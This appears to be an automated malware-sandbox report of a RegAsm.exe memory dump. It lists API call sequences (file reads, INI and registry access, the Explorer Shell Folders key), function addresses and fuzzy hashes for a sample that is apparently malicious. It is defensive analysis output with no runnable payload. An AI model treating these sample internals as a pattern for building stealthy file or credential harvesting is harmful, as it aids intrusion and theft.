                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _wcsicmp
                                          • String ID: /stext
                                          • API String ID: 2081463915-3817206916
                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                          • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$??2@CloseCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 1023896661-0
                                          • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                          • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                          • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                          • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                          • CloseHandle.KERNEL32(?), ref: 0040CC98
                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 2445788494-0
                                          • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                          • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                          APIs
                                          Strings
                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: malloc
                                          • String ID: failed to allocate %u bytes of memory
                                          • API String ID: 2803490479-1168259600
                                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcmpmemset
                                          • String ID:
                                          • API String ID: 1065087418-0
                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                          APIs
                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                          • CloseHandle.KERNEL32(?), ref: 00410654
                                            • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                          • String ID:
                                          • API String ID: 1381354015-0
                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                          • Opcode Fuzzy Hash: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                          • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                          • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                          • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                          APIs
                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                            • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                            • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$Time$CloseCompareCreateHandlememset
                                          • String ID:
                                          • API String ID: 2154303073-0
                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                          APIs
                                          • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$PointerRead
                                          • String ID:
                                          • API String ID: 3154509469-0
                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                          APIs
                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                          • String ID:
                                          • API String ID: 4232544981-0
                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                          APIs
                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FileModuleName
                                          • String ID:
                                          • API String ID: 514040917-0
                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                          APIs
                                          • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                          APIs
                                          • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                          APIs
                                          • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                          APIs
                                          • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                          APIs
                                          • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                          APIs
                                          • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: EnumNamesResource
                                          • String ID:
                                          • API String ID: 3334572018-0
                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                          APIs
                                          • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                          APIs
                                          • memset.MSVCRT ref: 004095FC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                          • String ID:
                                          • API String ID: 3655998216-0
                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                          APIs
                                          • memset.MSVCRT ref: 00445426
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
